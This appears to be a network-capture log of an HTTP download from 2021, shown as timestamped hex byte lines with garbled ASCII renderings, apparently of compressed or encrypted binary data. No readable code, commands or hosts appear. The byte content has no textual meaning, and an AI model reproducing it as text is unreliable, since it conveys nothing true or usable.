                                                                                                                                                                                      2021-10-30 11:52:10 UTC206INData Raw: 72 2f d7 39 c9 83 77 8d f1 c1 72 2e a3 c2 0c 13 2a 13 23 93 27 46 82 5f 47 22 7c 1e cd 3f 52 dd 37 b7 77 db a6 da f2 b1 1b cf b4 6b 7b 3b 3e 1d e2 63 ec 39 de e7 31 74 2e d5 f9 a4 a3 77 32 e0 4e ed 61 f8 0a 24 ec 0e 94 8b a1 46 fa 58 46 c2 51 3a 2c 0a 47 ed 97 da 4d 76 ef f7 9d 3e df 2e ce 2d b6 47 ce 5f 68 0f 9d 3b db 1e ba 74 b1 cd 2f cd 5b 0e 28 b9 a8 88 01 f5 ab f8 3e dc 93 91 b6 23 43 5c 75 ec a9 9f b9 47 8c ba e8 0b 64 c6 e7 a4 58 8c 90 25 7d c5 13 98 bc 8a 03 59 63 b0 b3 7b 87 ae 3f 0e 2f 9a 18 6f f0 88 91 8e 91 00 f8 12 88 68 6d ee ef fa e9 d0 fa 58 bf 78 a0 1c 7a 20 99 f1 c0 82 df 47 27 1d 65 22 32 8f 82 f0 4a 9f 41 b7 1e bc a8 1d 2c 71 fa 02 40 56 91 4d c2 ce 57 38 90 34 20 f2 3d 8e 97 b4 84 91 45 64 0f 8c 79 f0 89 ef b0 f8 49 d9 c4 03 29 03 04
                                                                                                                                                                                      Data Ascii: r/9wr.*#'F_G"|?R7wk{;>c91t.w2Na$FXFQ:,GMv>.-G_h;t/[(>#C\uGdX%}Yc{?/ohmXxz G'e"2JA,q@VMW84 =EdyI)
                                                                                                                                                                                      2021-10-30 11:52:10 UTC207INData Raw: c0 40 c3 50 83 ff 2f 7f e5 e7 7a 8c 29 62 bd fc a5 f7 bd c5 1b cc b7 bd ed 6d ed c5 2f 7e 71 15 10 7c e9 97 7e a9 3f ee fe 92 fb 1e 6e 6b 0b 2b 35 51 8b 3f 5c 8c 55 ff 30 54 84 ef 97 c6 22 1f a5 9d 16 fe 85 d3 67 db bc c2 5c 51 f0 6b 86 90 83 c6 ea fd e7 ce b4 b3 0b f3 ed cc ca b2 fb 13 43 84 13 52 64 e4 3e d5 5c 4b 3a 72 d8 d1 a6 8b d7 e3 70 ea c7 4b 6b 79 e2 93 cb be 9b 9a ff 77 b4 41 62 4e 62 93 94 f1 c3 06 8f 53 2a 04 4a 79 68 c2 77 2e 29 e2 6c c4 28 1d b0 0e 28 8c 0f 10 06 e8 07 fa d8 c6 bb f8 a3 af d1 01 0c b6 3a 89 63 4e a8 87 1e 8a 6e 19 43 84 eb 54 d4 2c 68 ae af 0f d1 43 cb 0f 84 89 3e 73 1b 06 29 f7 c4 56 d9 aa 1b be 99 9b c2 0f 32 0e 3f 59 84 01 f2 e0 0f 63 99 a2 36 70 7b 39 e4 80 8f b3 11 d8 47 34 ff 91 6d 68 a7 4e f8 e6 92 2b f1 49 b9 d0 1a
                                                                                                                                                                                      Data Ascii: @P/z)bm/~q|~?nk+5Q?\U0T"g\QkCRd>\K:rpKkywAbNbS*Jyhw.)l((:cNnCT,hC>s)V2?Yc6p{9G4mhN+I
                                                                                                                                                                                      2021-10-30 11:52:10 UTC208INData Raw: 70 68 8f fd 05 d8 96 f8 f2 ff f3 9b ae fc c6 5b 3e d2 6e ec 6a 72 bb bb dc ae 6f de 6d bf f7 d1 eb ed 83 1f 79 a6 6d ed 6a 10 dc 5d 68 1f ff e4 b5 f6 ba 1f 7e 5d fb f1 1f fc a1 76 eb e6 8d 76 69 75 b1 2d 49 b1 a9 86 1f bb 0f 0c 25 8d 1a 55 a2 8a 60 56 b2 ba 73 97 e3 6c 55 aa d1 16 26 e6 b5 eb 05 14 f5 c0 62 12 81 f7 9c 28 79 31 82 71 fd b8 e1 54 44 6c e1 02 9e 84 dc ce ba dc a1 02 9e a0 7c 0f 8c 88 70 8f 07 8f d8 e2 63 4c a0 40 b8 08 d2 0d 57 79 26 72 6e 2c e6 e5 92 7e d5 86 e2 73 b3 f3 36 f8 e0 93 a7 1e 97 17 97 9c 57 97 22 54 5f 5f 00 78 85 47 4e f0 10 ae ef 0f 51 7b 11 2e 86 1e bb 3f ee b7 9a 97 71 87 c1 b6 24 63 96 b4 1d 4d 8a 37 77 b6 fd 11 63 1e 6d e7 55 13 be cc 2b 83 04 f9 79 b7 46 fb cd 69 c1 d8 a9 00 b2 35 30 7b 09 e0 95 3a f1 29 38 e2 d3 56 5c
                                                                                                                                                                                      Data Ascii: ph[>njromymj]h~]vviu-I%U`VslU&b(y1qTDl|pcL@Wy&rn,~s6W"T__xGNQ{.?q$cM7wcmU+yFi50{:)8V\
                                                                                                                                                                                      2021-10-30 11:52:10 UTC210INData Raw: 36 19 70 69 28 8b 2e 06 31 1c dd e6 84 57 3e 9c 53 8f 88 59 3e a9 9b 30 70 9c cf 91 37 d5 ee b8 c3 f2 a9 97 d3 f6 42 50 59 f8 53 79 38 36 df a4 c9 f7 66 4f 40 b8 6e a1 28 59 fa b4 43 61 36 4a 22 ea 79 ca 73 88 70 38 59 07 38 49 27 9d 38 f3 0e 73 52 5d 82 a1 35 a5 03 cc 35 8c 35 76 fb bf f2 9e df b6 41 c5 f7 3c 39 fd fa 74 00 23 ed 7b be e7 7b da 03 67 2f b4 2f 7a e9 67 56 9b 24 eb 8f 3e f3 54 fb d5 f7 bf d5 97 52 7f eb b7 7e ab 63 17 7c c3 37 7c 43 fb f1 1f ff f1 f6 8a 87 5e d8 5e fa e0 0b fd aa 19 74 9f cb b1 7c fe 8c 13 3e 78 c5 a8 c8 2b 6c 90 9b fb 20 20 11 e7 fe 57 64 61 39 9e 98 f3 7d 6b 2b 72 cb ca bb b4 b2 d2 2e ac ae 7a 1e e2 46 6f 36 bb bc 72 c8 b7 17 c8 98 e3 db bb 18 76 bb 32 56 6f 68 2e da 93 5c b9 dc c9 b7 3a f9 b6 a7 bf 05 ac 4d 25 da 50 97
                                                                                                                                                                                      Data Ascii: 6pi(.1W>SY>0p7BPYSy86fO@n(YCa6J"ysp8Y8I'8sR]555vA<9t#{{g//zgV$>TR~c|7|C^^t|>x+l Wda9}k+r.zFo6rv2Voh.\:M%P
                                                                                                                                                                                      2021-10-30 11:52:10 UTC211INData Raw: cd 0d 29 97 34 c7 c1 e9 f5 02 f0 08 2e 2e f5 8d 75 31 97 25 0e 0d e3 0b 07 5e 01 68 27 0c 84 97 b4 c5 b4 f9 29 0c 24 0d 48 bd 00 e9 33 5f f8 e2 57 5d d9 3f 82 00 97 0b e7 94 a8 41 a3 c1 c3 b7 35 99 e0 98 08 45 59 0b 31 27 4d a5 d0 dc e8 5b 9f 78 e2 1e 25 c2 9c 7e 69 61 c7 38 c2 70 51 e5 25 f6 aa 88 10 61 ef 80 d5 18 2a e6 44 0a 7c 66 0e 68 9d 5e 59 d6 f4 ce d3 9c b3 be bc c8 cd b2 34 9b 1d e1 82 ca f0 a1 f0 65 19 41 6b 8b f5 01 f1 b5 85 05 7f 19 60 69 9e 2f 01 cc fa e3 c5 18 01 f8 0c 50 16 28 6a 70 63 55 07 46 21 69 f0 81 91 c7 a7 93 bc 1b 57 36 bb 29 3a 96 74 2e 6b e2 e0 d1 af 32 90 2c 78 62 8a 56 b1 9b e5 be 2b be 71 b9 b9 77 d0 9e d9 d8 6c 1b 7b fb ed a6 e2 4f c9 38 e1 7e 11 6e 9e 47 3e ab 3c 85 2a 59 ed ee ee b7 ab cf 5c 6b eb db 3b 3e 69 da 91 9c 38
                                                                                                                                                                                      Data Ascii: )4..u1%^h')$H3_W]?A5EY1'M[x%~ia8pQ%a*D|fh^Y4eAk`i/P(jpcUF!iW6):t.k2,xbV+qwl{O8~nG><*Y\k;>i8
                                                                                                                                                                                      2021-10-30 11:52:10 UTC212INData Raw: d7 80 a2 5e 7c c7 45 c3 fd e4 32 f7 0e c2 0c e4 a4 3d 5b db 02 63 38 78 b5 80 55 9e d3 28 23 3d 75 fd a4 13 d6 18 63 12 08 e9 94 4d 19 b4 ce 53 63 5f 18 27 8b 62 0a 08 08 e3 8e f3 13 59 03 84 ad 9f 72 25 f3 2e 77 e5 81 eb 34 24 a2 30 32 ad d7 24 10 ae 0d 11 bf d0 c3 47 9e 96 8f 7c da 41 ff 31 46 08 73 1f 13 0b b5 89 8b 4d f4 c4 b7 50 28 e2 7b 96 1c 52 3a 06 1d a7 e7 1a db 8c 33 69 53 e3 c5 af 37 b7 d7 db b5 f5 6b 7e c7 d9 3f fb 67 ff ec 1e fd 79 2e c0 c7 d7 79 71 ed 63 f7 3d bf ad 2e 68 fc a8 32 be 29 fb df de fb 16 cb e9 df ff fb 7f df 9e ff fc e7 77 ec 82 6f fa a6 6f aa 32 97 1f 6c 97 ce 5c f0 13 d2 00 8b 80 79 95 8f ec 4b d7 4b e6 f0 65 bd 93 7f 8b 4d b0 da 4b 7f d6 98 50 1b d5 56 1b 35 8a 23 0a 0c 2c ca f2 94 b9 69 99 b2 f4 5c b2 ab 97 c1 9e 50 3d c2
                                                                                                                                                                                      Data Ascii: ^|E2=[c8xU(#=ucMSc_'bYr%.w4$02$G|A1FsMP({R:3iS7k~?gy.yqc=.h2)woo2l\yKKeMKPV5#,i\P=
                                                                                                                                                                                      2021-10-30 11:52:10 UTC214INData Raw: 02 f8 33 9f ff 82 57 5c f1 fe 4b f4 30 b6 58 7c 20 25 bd 73 25 3e 39 83 25 0d 70 1b 3d 52 fe 91 10 55 a4 73 c2 8c 32 26 8e 7b c7 d8 f5 51 16 07 9f 94 a1 1e 2e 3d 32 d9 71 aa 25 64 d3 f6 a4 ee 7c 2d 92 32 ae 58 24 3d c9 f7 9b 38 5d 4e 38 d0 66 f2 0b 1e f5 f2 00 04 93 58 dd 4b 55 3b 1f 94 cf 75 6b 01 f7 c4 26 5a 0c 1e ea c5 91 4f 83 f9 36 1c e9 7c 70 7c 47 06 d9 93 d7 9e 69 9b bb 7c 8e 88 a7 ac 9a bf d5 c9 65 cb 8d 03 4e 88 6e f9 84 68 0f 23 04 23 4d 8e 8f 80 f3 ee 22 0c 36 0c 31 3e 6e 7c 47 75 61 2b 7b 92 94 f1 c7 e3 f5 eb fe 5c cb 81 2f 41 70 29 23 93 f3 a4 e3 04 96 2b 72 34 d4 82 46 5b c5 1e 7f e6 19 43 d5 f2 c2 58 10 2e b2 09 05 e2 fc 52 0e c3 82 cf 0b ad 2e 2e b7 95 b9 05 df cb 32 af b4 39 f1 c7 c4 cd 4d cd 5c a2 e5 3b a4 fb 6a 3b 35 63 94 61 b0 fa 1e
                                                                                                                                                                                      Data Ascii: 3W\K0X| %s%>9%p=RUs2&{Q.=2q%d|-2X$=8]N8fXKU;uk&ZO6|p|Gi|eNnh##M"61>n|Gua+{\/Ap)#+r4F[CX.R..29M\;j;5ca
                                                                                                                                                                                      2021-10-30 11:52:10 UTC215INData Raw: 7f 95 d3 c0 d7 38 c4 47 2f af af 5f f7 37 79 ff ca 5f f9 2b 7e f9 ec a7 03 3c 44 f0 cd df fc cd 9e a4 9f 77 f1 7e b7 93 b1 fb b6 0f bf d7 86 0b f7 a5 bd f6 b5 af ed d8 05 39 4d 63 93 f4 05 2f fd 4c 8b 1a 3e d5 28 1b 4b 52 2e 9f c4 78 cc 74 23 8c d6 d3 37 13 d9 a9 10 f9 b4 8b 6f b0 52 a7 fb 45 78 f6 a1 23 24 68 03 94 23 62 23 59 72 b6 ee 6b be 43 13 fd 2a 16 4e d0 35 f7 70 6b 06 69 be 94 ac 7a 78 a0 c1 e5 15 f6 e9 a3 7f 05 36 c4 c5 27 29 be c4 6a e9 77 1d d0 8f f6 38 2c 7e 5c bf 73 3b 2f dd 4f 78 a2 ff 03 a4 cf 81 49 f9 9e e6 ff bd fc a7 e4 f5 fa 88 c1 23 10 bc 32 6c ee d5 51 87 95 57 ba 34 6d 1f 61 fa 42 08 e6 8f f9 21 1b 3d d3 97 ec b3 b0 22 53 f2 7b b3 fd 8f f1 46 7a d1 af 32 e6 41 e9 d4 e5 39 5d 19 a4 55 b9 3e 3f e1 a8 5a d9 e1 93 32 d5 77 b5 d9 01 b2
                                                                                                                                                                                      Data Ascii: 8G/_7y_+~<Dw~9Mc/L>(KR.xt#7oREx#$h#b#YrkC*N5pkizx6')jw8,~\s;/OxI#2lQW4maB!="S{Fz2A9]U>?Z2w
                                                                                                                                                                                      2021-10-30 11:52:10 UTC216INData Raw: 0e 94 3c d4 21 6e 76 b5 4b a9 ce 83 47 b5 68 92 46 d8 69 92 33 6d 44 1a 6e a3 7e 25 19 01 72 50 be 17 4e ad 78 7e 25 86 c2 bc 3b 8e 4b c9 e0 63 a8 f1 90 03 6f 25 f7 d3 71 e2 d9 1f 6b c6 17 7f bc 92 84 c7 f4 b9 e4 89 91 c6 cd c6 db 5c f6 d5 e4 0e 0e 8b cd c9 59 d1 50 65 75 82 28 27 7c 49 41 f2 af 36 d5 89 21 03 3d 93 57 29 a8 65 23 1a 69 63 20 79 cf 15 ac 2b f2 2d 0f 39 45 05 a2 81 6c 31 20 a1 65 87 3c d4 ff 6a 67 0c c5 89 1c f1 95 c7 50 c6 d8 e3 52 3d 4f 72 62 a0 a1 af 4c 8c c8 2c 90 ba a0 1b 79 c3 71 f8 26 cd ba 86 8e 91 8e 73 9d 3d 9d 1f 65 61 36 7e cf c3 55 3b 2a ed d9 64 91 b2 93 72 b8 1e c7 a5 cc a4 8e 1e e6 47 5f 50 20 3c 84 ef 94 01 ee 09 e3 86 78 e8 05 c8 4b fd e1 bb 8e f1 a7 65 02 de 29 f6 e4 18 ef 94 4d 18 79 b1 c1 a9 31 54 86 0a 1c fa 74 8c 85
                                                                                                                                                                                      Data Ascii: <!nvKGhFi3mDn~%rPNx~%;Kco%qk\YPeu('|IA6!=W)e#ic y+-9El1 e<jgPR=OrbL,yq&s=ea6~U;*drG_P <xKe)My1Tt
                                                                                                                                                                                      2021-10-30 11:52:10 UTC218INData Raw: e3 83 16 5c 60 e4 69 74 94 0d a0 4f 00 e9 63 d9 e0 91 86 de 4e cb 4c f9 0a bd 00 69 29 03 10 26 3f 7c 00 49 9b d2 9e 96 07 c6 34 7c ec 08 25 4e d2 28 17 37 d6 47 7e e2 c1 75 7a 2f 83 fe 04 17 67 ba 02 70 e1 0f 1f 07 ce 08 a4 e5 ca 22 e5 20 98 f5 3c f8 27 ff 8f af fd 9a f6 cc c1 d5 76 eb 14 97 84 b4 48 69 99 3f a5 c5 cb f7 e9 68 f1 e2 bd 59 94 5c e6 55 0e 4a 43 88 bc bd 7c 66 46 04 14 b6 ef 7a 65 c8 cd 55 65 b9 7c 59 83 ae 2c f9 3a b5 e8 42 17 c9 32 30 2a 0d 23 2d 2f 41 25 db 8c c9 a1 f8 4c 86 65 b4 69 17 78 4b 83 42 63 e1 f0 40 3b 45 f9 3b db 7b 6d 73 73 ab dd bc 79 d3 74 c1 75 87 4d 75 c1 75 f3 12 4f 9f 2e 75 ba 00 82 a0 be cd ad 2d ef 72 3f be 71 b3 3d b9 b3 d5 d6 85 bb 23 03 84 d7 46 ec 1e 4d 5f 46 cb 49 18 93 14 bc 32 a1 91 8e e3 9b 72 4c 66 75 6a 04
                                                                                                                                                                                      Data Ascii: \`itOcNLi)&?|I4|%N(7G~uz/gp" <'vHi?hY\UJC|fFzeUe|Y,:B20*#-/A%LeixKBc@;E;{mssytuMuuO.u-r?q=#FM_FI2rLfuj
                                                                                                                                                                                      2021-10-30 11:52:10 UTC219INData Raw: 47 18 9d 37 bd 81 c5 8a f7 89 68 e0 21 34 d3 af e0 20 e7 a4 d3 27 30 80 4c 01 97 95 9f b2 75 8a 4d 8e e2 2a be be 7e b3 6d 6d 6f b5 bf f9 37 ff 66 fb f6 6f ff 76 32 9e 33 30 87 f0 52 5c 0c 89 0b e7 2e 8a ee 9d 76 fd e6 75 e7 f1 b0 c0 f1 07 08 b8 3c ca 27 a9 30 d4 1e ba f4 60 3b b7 76 d6 b2 a2 8d 59 c4 c2 37 e0 f6 81 20 7e d1 09 9f 70 61 2c a9 8d b4 13 8d a8 f6 31 77 f5 f6 f2 eb 69 91 b3 82 96 31 f2 a7 f1 8c 35 a1 38 1f 5d 06 38 41 9f d5 86 97 be 02 3f 7a 49 3e f3 0a 7c 20 37 e6 de 89 01 42 bd 1a cf 5c 22 f5 86 53 69 7c 49 86 ba 81 f0 65 7e c0 ef 6d 23 6c 06 3a 38 2e e0 a4 ec a6 e4 c7 bd 82 ff e2 5f fc 8b f6 67 ff ec 9f 75 fa 71 40 de 7f f5 af fe 55 1b 6e dc 17 78 ee fc 05 d3 46 5e a9 2b 4e ff 9c 86 03 12 26 2f e1 f0 45 98 5b 1b dc d8 1e 87 66 c6 56 c6 bb
                                                                                                                                                                                      Data Ascii: G7h!4 '0LuM*~mmo7fov230R\.vu<'0`;vY7 ~pa,1wi158]8A?zI>| 7B\"Si|Ie~m#l:8._guq@UnxF^+N&/E[fV
                                                                                                                                                                                      2021-10-30 11:52:10 UTC220INData Raw: bc ba 21 43 4e 6e eb e0 b0 dd dc d9 2d 23 6d 76 be 9d 93 11 6a 46 84 8f c0 9e 5e df 68 ef 7f fa c9 f6 89 ed f5 b6 6b e3 4c 26 88 4f 87 78 62 93 93 22 3a ac 04 0b 6f b4 2b 9d 68 5e 3b 24 0f 40 64 6e af c0 38 c8 01 27 b9 91 ee 3c 9a a9 3c 1c 13 f3 08 a4 a1 d6 c8 84 1a c0 97 a4 ca 68 10 0d 4e ca e6 d5 ce 55 8c 31 c9 67 5e 86 ed ac d2 31 ca f0 f9 a2 03 f9 3c 38 50 97 f6 aa bf 38 c2 17 93 e6 8f 13 3a 8c 3b ee 0d 64 f2 db dc db 69 1b dc c8 7b 70 e0 81 54 1f 4a 9f f1 e5 11 fa c8 f7 22 aa ac bf 79 2a 19 f9 7e bd 6e 8c f9 f2 b6 f2 50 30 7f 44 9f 36 e8 97 b6 a6 9d 38 25 38 1f b0 1c 04 4e 1f e0 f7 4b 3f 0e d1 c1 38 e2 5c 7e 4c 79 c0 79 fe 81 8f 81 c0 67 d2 64 cc 2a bd 4e 25 25 59 39 26 5c 9f 56 aa ad 00 6d 8e de 46 37 d1 5d 78 8a ce 96 6e dc 3b b0 0d b4 b5 07 29 77
                                                                                                                                                                                      Data Ascii: !CNn-#mvjF^hkL&Oxb":o+h^;$@dn8'<<hNU1g^1<8P8:;di{pTJ"y*~nP0D68%8NK?8\~Lyygd*N%%Y9&\VmF7]xn;)w
                                                                                                                                                                                      2021-10-30 11:52:10 UTC222INData Raw: 66 ad 02 88 5b df 3a 24 3c d6 27 94 01 8a 6f 2a e2 07 f9 c2 9b f6 6b fc 40 da 33 b6 25 7c a5 7e fc 8c ed 40 ca 28 e0 78 f0 00 fc 38 d2 53 07 90 f0 e8 03 c1 53 68 c2 c7 58 06 20 9d 03 90 b4 1d 60 d3 06 1e 32 27 cf ba d6 cb 66 a3 50 e1 7b db 3d 85 a2 0d a4 7d a9 2f 90 b2 e1 2b 70 9c 26 f1 31 3f 7c 16 3f 8a 8b 1f c2 15 9f e2 e2 df db a6 a9 dc 46 dc d1 0f a4 5c f1 36 f2 1e fc 29 1d 85 9c 36 96 4f 9b 4f fe f6 cf ff 54 7b fa c9 ab da 4d 4b 60 f3 4b ed 2b be f6 ab db b5 9d 8d 76 f2 94 90 b5 82 88 77 fb 0c ca ba f1 5c 09 30 43 b2 08 7a d0 6b 81 f2 cb 63 a5 c4 d4 c1 ae 8b fb a4 18 fc dc 33 96 41 c9 a9 05 0c e3 c0 1d 7d 3a 0c 66 7d d3 eb d1 a1 eb e3 72 1d 4f 19 ae 6f 6f fb f2 27 2c 73 09 8e a7 0d 31 c0 b8 67 8d ce e7 e6 d8 43 95 3d 50 7d 7c 3e fd 50 ec 32 a5 80 73
                                                                                                                                                                                      Data Ascii: f[:$<'o*k@3%|~@(x8SShX `2'fP{=}/+p&1?|?F\6)6OOT{MK`K+vw\0Czkc3A}:f}rOoo',s1gC=P}|>P2s
                                                                                                                                                                                      2021-10-30 11:52:10 UTC223INData Raw: f9 e9 18 ca 45 6e 01 e2 bc c7 0a f8 ba af fb ba c9 f8 e4 d4 e8 6b bf f6 6b ed bf f9 cd 6f 96 b1 b6 e9 cb a2 0b d2 3d cb 4c b4 aa b6 a2 eb 7a cd 8f 64 2a e7 b4 ee 9c d6 27 68 d7 8f ef 92 05 91 5d fc b4 19 07 8c 7d 11 48 98 dd 39 60 f9 0c 78 31 78 b6 79 12 59 f3 07 ef 4e fb aa af fa 2a e7 7f 3a c0 09 19 27 72 e6 5b c0 27 a4 fe f4 9f fe d3 0e 8f 80 ac b8 2f 8d 5b 35 ce 9f bb e0 ba d3 1e 00 09 dd c3 1f e9 bd 39 c6 ed 12 71 ba 82 d9 18 a0 03 c1 87 1e bf c4 8d 2b 98 c8 4b e1 fa df e9 c4 97 a3 0f 26 fa a4 1f f3 58 68 50 73 d5 4f 1d e8 6f 95 31 47 c1 a1 6e 25 5b 0e 8a 03 0e f3 27 ba e8 7d c0 5c 92 07 f4 b2 5b 32 f6 59 3f fe f2 5f fe cb cf 2a bf 3f 08 b8 94 fc ae 77 bd cb af 5e e2 a9 5b f8 89 9e a6 0d e1 71 94 71 c2 e3 38 9a 38 e9 23 ad 20 0c 2d f2 99 93 45 c4 65
                                                                                                                                                                                      Data Ascii: Enkko=Lzd*'h]}H9`x1xyYN*:'r['/[59q+K&XhPsOo1Gn%['}\[2Y?_*?w^[qq88# -Ee
                                                                                                                                                                                      2021-10-30 11:52:10 UTC224INData Raw: e5 38 4e 79 38 f9 99 d3 8e 0b b1 b0 f8 60 58 52 86 3a b8 ec c5 c0 46 f9 a9 83 cb 78 fe 36 65 26 20 fd 8d 02 85 17 d2 a9 be e2 c5 63 78 8d 1f 40 98 01 72 cc 5d e7 93 c9 8b f6 d2 06 2b a6 d2 e3 17 6f 35 01 23 17 e2 38 ca 79 32 52 98 c9 85 a7 38 39 8a 07 e8 dc eb d7 6f d4 5b c6 fb c0 04 6f 75 79 b9 dd 77 e9 a2 68 9d d4 ce 13 63 55 06 da c2 82 4f d5 ce ac 2c b5 73 4b cb 6d 4d 74 b8 af ad 3e 1f 55 4f 2c d5 20 50 df 2a 5c 6d e6 e4 90 07 34 a0 5f 97 41 79 5d 09 71 0f 64 fd fc 98 be 17 93 2a 3b 02 71 b7 7d 90 49 94 2d b8 d5 7b 83 eb f8 63 99 df 0f 2c 5f a1 81 9b 09 1a bf e4 a9 85 0c fd b5 7e 9e f2 a5 4d 5e 0c cc 6b 5f e6 67 e6 ec 03 e8 25 61 7c e4 60 1d 36 2d 4d 16 a6 5f fc 62 a4 45 e7 69 3b ae d2 30 e4 64 cc 2a ec 06 08 c8 f3 42 d7 db 88 ef d3 25 fd 98 dc f3 44
                                                                                                                                                                                      Data Ascii: 8Ny8`XR:Fx6e& cx@r]+o5#8y2R89o[ouywhcUO,sKmMt>UO, P*\m4_Ay]qd*;q}I-{c,_~M^k_g%a|`6-M_bEi;0d*B%D
                                                                                                                                                                                      2021-10-30 11:52:10 UTC226INData Raw: 34 52 0f 7e e8 a6 4f 70 4e 57 5a f2 46 08 9f 49 c7 1f 1d e5 47 00 2d f5 52 67 c2 a0 99 57 d6 a9 ae 2d 29 4b 3e 90 ba 70 c7 fb 09 02 63 1c 5c 1c 50 f2 71 b0 70 07 a0 8e f0 30 c2 71 3a 71 e0 46 36 d0 a5 0d 36 c6 87 32 38 d3 04 5f 64 d3 3f 2e 27 3c fa 06 27 c4 1a 33 c4 85 c7 3d ee 38 49 45 e5 94 07 4b c6 a9 b1 e4 03 20 85 29 03 d4 38 bf 97 f7 f0 86 03 12 3e 79 b0 7f d0 4e ca aa dd d4 e4 4b 25 1c a5 63 1c 3c f4 c0 83 7e 39 21 27 34 62 bd dd d5 42 ed a3 64 0a a9 01 e2 c0 04 18 fc 59 ac 68 30 69 4c 8c 75 9a 35 7d cf 0c 3e f9 e0 13 0f 73 18 4c 5c 4e e3 95 10 18 1f dc 0f c5 a9 1a 42 02 68 2c 65 31 72 fc 44 21 b4 48 d7 8f 72 2c 9c 5b bb bb be 34 b7 73 20 03 45 c6 c9 11 02 53 19 59 96 3e 71 63 e2 81 67 92 66 66 6b 12 2a 81 a9 15 aa 06 a5 af 36 95 32 85 3f 7c 20 9d
                                                                                                                                                                                      Data Ascii: 4R~OpNWZFIG-RgW-)K>pc\Pqp0q:qF6628_d?.'<'3=8IEK )8>yNK%c<~9!'4bBdYh0iLu5}>sL\NBh,e1rD!Hr,[4s ESY>qcgffk*62?|
                                                                                                                                                                                      2021-10-30 11:52:10 UTC227INData Raw: 18 91 cb 46 85 fc 09 ed de 7f ae 57 f1 f0 48 f8 96 fa 93 0f b0 b3 59 fc a2 2f fa a2 49 de 73 75 18 6a 31 4c 69 f3 98 f7 ce 77 be d3 2f ba b5 91 b6 b8 d4 2e 9d bb d8 65 4a eb a7 bf f4 75 f8 05 46 7f 32 b6 14 2f 83 5b b8 5d e5 a9 27 f3 52 61 4c 61 a4 e1 b6 53 46 b2 ad fe 2d 99 41 6f b2 30 f3 13 3d e0 1e fd 94 1f 5d 06 b8 4f 93 31 64 ae 3a 3d df 93 dc db 3d 02 ed ca 5c 51 3a 50 e5 28 cf 2f c6 d1 76 bf ec c9 bd 8e a1 f3 5c 5d 4e d3 f8 72 ca dc 29 ad 13 1c 59 88 8d cc cb 80 75 ca 3c 3a d6 9d 55 50 3c 94 3c 7c bb 00 e3 0f 27 b9 d0 4f c8 08 1a 91 05 fa 82 2c fc 49 40 36 61 ac 2f 72 ac 4b 8c 79 0c 06 80 b6 02 94 43 be 91 21 b4 90 2d bc 91 16 1f e7 f1 da 1d 78 94 0b 90 16 9a ee 2b e5 8f 65 43 3b e9 00 7e 95 29 1e 46 9e c8 4b 3d c4 01 e2 c7 69 e1 00 d2 09 43 23 74
                                                                                                                                                                                      Data Ascii: FWHY/Isuj1Liw/.eJuF2/[]'RaLaSF-Ao0=]O1d:==\Q:P(/v\]Nr)Yu<:UP<<|'O,I@6a/rKyC!-x+eC;~)FK=iC#t
                                                                                                                                                                                      2021-10-30 11:52:10 UTC228INData Raw: 95 dd c3 1c 45 d6 3b 56 7c 6a 04 65 6d 98 1d 17 e5 61 77 08 05 ed b0 26 ab 03 52 ca 0e 0e ed 2c c7 f7 ee 29 7b 76 ee 28 db 55 86 95 38 94 3c a5 73 39 2a 83 6d 7b ee 63 b1 9b 44 77 e4 8d 5b be 13 b7 79 fb 56 29 5e dc 87 e3 45 0b 16 3b 85 6d ad 9d 96 dd 35 76 68 f8 9d 4b 68 6c 16 0f 3b 3a 05 d2 4a a0 3a 23 93 0c 9d 92 dd 3a 40 1d 41 64 e3 ba 76 fe d6 8e 3c 7c 1c 21 49 f8 98 44 51 9e 48 3b 7f 9b 0e 90 b7 9f af 93 ab c2 6b 7a f5 35 f9 e1 c5 0b 9d e8 a0 b8 22 5b 94 4c 76 18 e1 97 7a f9 58 49 b0 72 a9 3e 8a 92 4a 1f 83 66 78 6e 6d 10 65 1a da 6d bc fe d5 7c 28 69 02 e1 83 03 3e e9 cd 37 51 aa 24 0f 04 94 8f e1 9e 25 84 18 27 18 73 07 61 fd f3 53 bf 17 18 ea da fd 29 dc 0a 33 8b 8d 6c 8e 6e a9 63 14 73 76 30 ac 60 77 b2 b5 7c 68 3f d9 b9 ac 0b 1d 06 8e 77 f6 d4
                                                                                                                                                                                      Data Ascii: E;V|jemaw&R,){v(U8<s9*m{cDw[yV)^E;m5vhKhl;:J:#:@Adv<|!IDQH;kz5"[LvzXIr>Jfxnmem|(i>7Q$%'saS)3lncsv0`w|h?w
                                                                                                                                                                                      2021-10-30 11:52:10 UTC233INData Raw: b3 43 41 c7 d8 a2 c8 c9 e5 1b e5 03 ff 7f ff a2 bc df cb 3e b8 8c 1c 1b d1 1c b9 5c de f8 a7 af 29 7f f0 ab bf 56 b6 2f ee 28 07 77 1f 2e ca ae 8e 83 86 59 27 13 18 60 61 45 09 61 f2 c1 4f 05 50 58 1c d7 75 da 30 95 ca 61 f8 ee 99 8f 35 e5 e6 cd cf 25 bf 99 59 8f 27 51 6e b6 e6 f2 a5 26 f8 c9 f9 b9 72 5d 06 45 6d 5a 36 93 03 3f 71 14 01 ba 92 e2 89 c5 27 7e 26 15 7f 0e 41 3c 98 57 fd 51 be bf b7 46 b9 52 f4 48 07 2f 3d 28 3e 7c 9a 66 87 b8 09 a7 9e 3d 5b 7f 94 47 7d 87 77 48 01 53 99 fe 56 99 92 b3 f8 78 c1 d1 d8 94 3a e5 41 cb d1 22 9f dc d8 61 99 55 7b 68 1b c7 a1 a2 21 73 64 ff 81 72 60 e7 ce f2 dc 53 27 ca be dd bb 7c d1 77 c7 50 dd ad 61 90 c2 07 6e cb 07 d9 32 58 2c 4f 29 bc 52 c0 96 35 71 99 77 55 09 fa a9 d9 dc d4 74 79 d7 d9 f3 e5 71 4d 68 b3 28
                                                                                                                                                                                      Data Ascii: CA>\)V/(w.Y'`aEaOPXu0a5%Y'Qn&r]EmZ6?q'~&A<WQFRH/=(>|f=[G}wHSVx:A"aU{h!sdr`S'|wPan2X,O)R5qwUtyqMh(
